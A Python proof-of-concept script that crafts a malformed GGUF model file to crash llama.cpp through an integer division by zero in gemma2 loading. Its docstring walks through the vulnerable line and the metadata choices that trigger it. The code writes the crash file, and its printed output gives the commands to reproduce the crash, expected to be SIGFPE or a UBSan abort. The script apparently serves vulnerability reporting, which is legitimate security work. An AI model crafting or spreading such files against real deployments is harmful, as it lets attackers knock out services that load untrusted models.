#!/usr/bin/env python3
"""
PoC: Integer division-by-zero (SIGFPE / UB) in llama.cpp gemma2 architecture loading.

Vulnerability:
  In src/llama-model.cpp, the LLM_ARCH_GEMMA2 handler computes:

    hparams.f_attention_scale = type == LLM_TYPE_27B
        ? 1.0f / std::sqrt(float(hparams.n_embd / hparams.n_head(0)))
        : 1.0f / std::sqrt(float(hparams.n_embd_head_k));

  When n_layer == 46, the type is set to LLM_TYPE_27B, so the first branch is
  taken. If the `attention.head_count` key is omitted from the GGUF file, the
  n_head_arr stays filled with 0s (from std::fill at line 552), so n_head(0)
  returns 0. This makes `hparams.n_embd / hparams.n_head(0)` an integer
  division by zero.

  The guard at line 606 (`if (hparams.n_head() > 0)`) only protects the
  n_embd_head_k calculation, not the architecture-specific code at line 1347.

Platform behavior:
  - x86_64: SIGFPE (hardware trap on integer division by zero), exit code 136
  - ARM64: Silent undefined behavior (ARM SDIV returns 0 for div-by-zero),
    but UBSan catches it and aborts with exit code 134

Attack vector:
  1. Set general.architecture = "gemma2"
  2. Set gemma2.block_count = 46 (triggers LLM_TYPE_27B)
  3. Set gemma2.embedding_length = 4096 (any non-zero value)
  4. Set gemma2.context_length = 8192 (required)
  5. Set gemma2.attention.layer_norm_rms_epsilon = 1e-6 (required for gemma2)
  6. OMIT gemma2.attention.head_count (this is loaded with required=false)
  7. n_head_arr stays all-zero => n_head(0) == 0 => division by zero

  The crash occurs during load_hparams(), before vocab or tensor loading,
  so no valid vocabulary or tensor data is needed.

Confirmed UBSan output:
  src/llama-model.cpp:1347:61: runtime error: division by zero
  SUMMARY: UndefinedBehaviorSanitizer: undefined-behavior src/llama-model.cpp:1347:61
"""

import os
import struct
import sys
from typing import BinaryIO

# GGUF constants
GGUF_MAGIC = b"GGUF"
GGUF_VERSION = 3
GGUF_DEFAULT_ALIGNMENT = 32

# GGUF KV type constants
GGUF_TYPE_UINT32 = 4
GGUF_TYPE_FLOAT32 = 6
GGUF_TYPE_STRING = 8


def write_string(f: BinaryIO, s: str) -> None:
    """Write a GGUF string: uint64 length + chars (no null terminator)."""
    encoded = s.encode('utf-8')
    # The length prefix counts encoded bytes, not characters.
    f.write(struct.pack('<Q', len(encoded)))
    f.write(encoded)


def _write_kv_string(f: BinaryIO, key: str, value: str) -> None:
    """Write one metadata entry whose value is a GGUF string."""
    write_string(f, key)
    f.write(struct.pack('<I', GGUF_TYPE_STRING))
    write_string(f, value)


def _write_kv_uint32(f: BinaryIO, key: str, value: int) -> None:
    """Write one metadata entry whose value is a little-endian uint32."""
    write_string(f, key)
    f.write(struct.pack('<I', GGUF_TYPE_UINT32))
    f.write(struct.pack('<I', value))


def _write_kv_float32(f: BinaryIO, key: str, value: float) -> None:
    """Write one metadata entry whose value is a little-endian float32."""
    write_string(f, key)
    f.write(struct.pack('<I', GGUF_TYPE_FLOAT32))
    f.write(struct.pack('<f', value))


def create_gemma2_divzero_gguf(output_path: str) -> None:
    """Write the PoC GGUF file to *output_path* and print usage notes.

    The file holds a GGUF v3 header, zero tensors, and only the metadata
    keys listed under "Attack vector" in the module docstring. The
    `gemma2.attention.head_count` key is deliberately left out.

    Args:
        output_path: Destination file; it is created or overwritten. The
            parent directory must already exist.

    Raises:
        OSError: If the file cannot be opened or written.
    """
    # NOTE(review): the header/metadata section below was rebuilt from the
    # "Attack vector" list in the module docstring and the public GGUF v3
    # layout -- confirm the key set against the loader version under test.
    with open(output_path, 'wb') as f:
        # ===== Header =====
        f.write(GGUF_MAGIC)
        f.write(struct.pack('<I', GGUF_VERSION))
        f.write(struct.pack('<Q', 0))  # tensor count: no tensors are needed
        f.write(struct.pack('<Q', 5))  # metadata KV count (entries below)

        # ===== Metadata =====
        _write_kv_string(f, "general.architecture", "gemma2")
        _write_kv_uint32(f, "gemma2.block_count", 46)  # triggers LLM_TYPE_27B
        _write_kv_uint32(f, "gemma2.embedding_length", 4096)
        _write_kv_uint32(f, "gemma2.context_length", 8192)
        _write_kv_float32(f, "gemma2.attention.layer_norm_rms_epsilon", 1e-6)
        # gemma2.attention.head_count is intentionally NOT written:
        # n_head(0) == 0 => n_embd / n_head(0) divides by zero => SIGFPE

        # ===== Alignment padding =====
        # Even with 0 tensors, pad to alignment boundary for spec compliance.
        current_pos = f.tell()
        aligned_pos = (
            (current_pos + GGUF_DEFAULT_ALIGNMENT - 1)
            // GGUF_DEFAULT_ALIGNMENT
            * GGUF_DEFAULT_ALIGNMENT
        )
        if aligned_pos > current_pos:
            f.write(b'\x00' * (aligned_pos - current_pos))

    file_size = os.path.getsize(output_path)

    report = (
        f"[*] Created: {output_path}",
        f"[*] File size: {file_size} bytes",
        "[*]",
        "[*] Vulnerability details:",
        "[*] Architecture: gemma2 (LLM_ARCH_GEMMA2)",
        "[*] block_count: 46 (triggers LLM_TYPE_27B)",
        "[*] embedding_length: 4096",
        "[*] head_count: OMITTED (stays 0 from std::fill)",
        "[*]",
        "[*] Crash location: src/llama-model.cpp:1347",
        "[*] hparams.n_embd / hparams.n_head(0)",
        "[*] = 4096 / 0",
        "[*] => integer division by zero (UB)",
        "[*]",
        "[*] Test with (x86_64 -- deterministic SIGFPE crash):",
        f"[*] ./build/bin/llama-cli -m {output_path} -p 'hello'",
        "[*] Expected: SIGFPE, exit code 136",
        "[*]",
        "[*] Test with UBSan (any platform -- clean UB report):",
        "[*] cmake -B build-ubsan \\",
        "[*] -DCMAKE_C_FLAGS='-fsanitize=undefined -fno-sanitize-recover=all' \\",
        "[*] -DCMAKE_CXX_FLAGS='-fsanitize=undefined -fno-sanitize-recover=all' \\",
        "[*] -DCMAKE_EXE_LINKER_FLAGS='-fsanitize=undefined' \\",
        "[*] -DCMAKE_SHARED_LINKER_FLAGS='-fsanitize=undefined' \\",
        "[*] -DGGML_METAL=OFF -DGGML_BLAS=OFF -DGGML_CUDA=OFF",
        "[*] cmake --build build-ubsan -j$(nproc)",
        f"[*] ./build-ubsan/bin/llama-completion -m {output_path} -p 'hello'",
        "[*] Expected: 'runtime error: division by zero', exit code 134",
    )
    print("\n".join(report))


if __name__ == "__main__":
    # An optional first CLI argument overrides the output file; without it
    # the original default location is used.
    if len(sys.argv) > 1:
        output_path = sys.argv[1]
        output_dir = os.path.dirname(output_path)
    else:
        output_dir = "/Users/eltarne/Documents/script/gguf_poc"
        output_path = os.path.join(output_dir, "poc_gemma2_divzero.gguf")
    if output_dir:
        os.makedirs(output_dir, exist_ok=True)
    create_gemma2_divzero_gguf(output_path)